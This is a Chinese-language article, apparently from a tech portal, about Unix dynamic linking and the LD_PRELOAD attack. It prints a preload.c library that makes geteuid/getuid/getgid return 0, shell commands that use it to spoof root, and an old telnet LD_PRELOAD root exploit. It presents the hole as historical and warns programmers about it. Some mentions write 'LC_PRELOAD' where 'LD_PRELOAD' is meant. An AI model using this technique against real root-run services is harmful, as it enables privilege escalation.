列舉Unix操作系統(tǒng)實(shí)例
一般來說,Unix操作系統(tǒng)程序的鏈接分為靜態(tài)鏈接和動(dòng)態(tài)鏈接,靜態(tài)鏈接就是把所有所引用到的函數(shù)或變量全部地編譯到可執(zhí)行文件中。動(dòng)態(tài)鏈接則不會(huì)把函數(shù)編譯到可執(zhí)行文件中,而是在程序運(yùn)行時(shí)動(dòng)態(tài)地載入函數(shù)庫,也就是運(yùn)行鏈接。
讓我們來一個(gè)Unix操作系統(tǒng)示例(這個(gè)示例來源于我的工作)。這個(gè)軟件是一個(gè)分布式計(jì)算平臺(tái),軟件在所有的計(jì)算機(jī)上都有以ROOT身份運(yùn)行的偵聽程序(Daemon),用戶可以把的一程序從A計(jì)算機(jī)提交到B計(jì)算機(jī)上去運(yùn)行。
這些Daemon會(huì)把用戶在A計(jì)算機(jī)上的所有Unix操作系統(tǒng)環(huán)境變量帶到B計(jì)算機(jī)上,在B計(jì)算機(jī)上的Daemon會(huì)fork出一個(gè)子進(jìn)程,并且Daemon會(huì)調(diào)用seteuid、setegid來設(shè)置子程的執(zhí)行宿主,并在子進(jìn)程空間中設(shè)置從A計(jì)算機(jī)帶過來的環(huán)境變量,以仿真用戶的運(yùn)行環(huán)境。(注意:A和B都運(yùn)行在NIS/NFS方式上)
于是,我們可以寫下這樣的動(dòng)態(tài)鏈接庫:
- /* 文件名:preload.c */
- #include <dlfcn.h>
- #include <unistd.h>
- #include <sys/types.h>
- uid_t geteuid( void ) { return 0; }
- uid_t getuid( void ) { return 0; }
- uid_t getgid( void ) { return 0; }
在這里我們可以看到,我們重載了Unix操作系統(tǒng)調(diào)用。于是我們可以通過設(shè)置LC_PRELOAD來迫使主程序使用我們的geteuid/getuid/getgid(它們都返回0,也就是Root權(quán)限)。這會(huì)導(dǎo)致,上述的那個(gè)分布式計(jì)算平臺(tái)的軟件在提交端A計(jì)算機(jī)上調(diào)用了geteuid得到當(dāng)前用戶ID是0,并把這個(gè)用戶ID傳到了執(zhí)行端B計(jì)算機(jī)上,于是B計(jì)算機(jī)上的Daemon就會(huì)調(diào)用seteuid(0),導(dǎo)致我們的程序運(yùn)行在了Root權(quán)限之下。從而,用戶取得了超級(jí)用戶的權(quán)限而為所欲為。
上面的這個(gè)preload.c文件也就早期的為人所熟知的hack程序了。惡意用戶通過在系統(tǒng)中設(shè)計(jì)LC_PRELOAD環(huán)境變量來加載這個(gè)動(dòng)態(tài)鏈接庫,會(huì)非常容易影響其它Unix操作系統(tǒng)命令(如:/bin/sh, /bin/ls, /bin/rm 等),讓這些系統(tǒng)命令以Root權(quán)限運(yùn)行。
讓我們看一下這個(gè)函數(shù)是怎么影響Unix操作系統(tǒng)命令的:
- $ id
- uid=500(hchen) gid=10(wheel) groups=10(wheel)
- $ gcc -shared -o preload.so preload.c
- $ setenv LD_PRELOAD ./preload.so
- $ id
- uid=0(root) gid=0(root) egid=10(wheel) groups=10(wheel)
- $ whoami
- root
- $ /bin/sh
- # <------ 你可以看到命令行提示符會(huì)由 $ 變成 #
下面是一個(gè)曾經(jīng)非常著名的系統(tǒng)攻擊
- $ telnet
- telnet> env def LD_PRELOAD /home/hchen/test/preload.so
- telnet> open localhost
- #
當(dāng)然,這個(gè)安全BUG早已被Fix了(雖然,通過id或是whoami或是/bin/sh讓你覺得你像是root,但其實(shí)你并沒有root的權(quán)限),當(dāng)今的Unix操作系統(tǒng)中不會(huì)出現(xiàn)這個(gè)的問題。但這并不代表,我們自己寫的程序,或是第三方的程序能夠避免這個(gè)問題,尤其是那些以Root方式運(yùn)行的第三方程序。所以,在我們編程時(shí),我們要隨時(shí)警惕著LD_PRELOAD。
關(guān)于Unix操作系統(tǒng)的示例我們就舉出這個(gè)來給大家參考。
【編輯推薦】